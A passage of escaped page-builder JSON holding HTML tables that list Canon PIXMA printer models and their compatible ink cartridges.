Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo 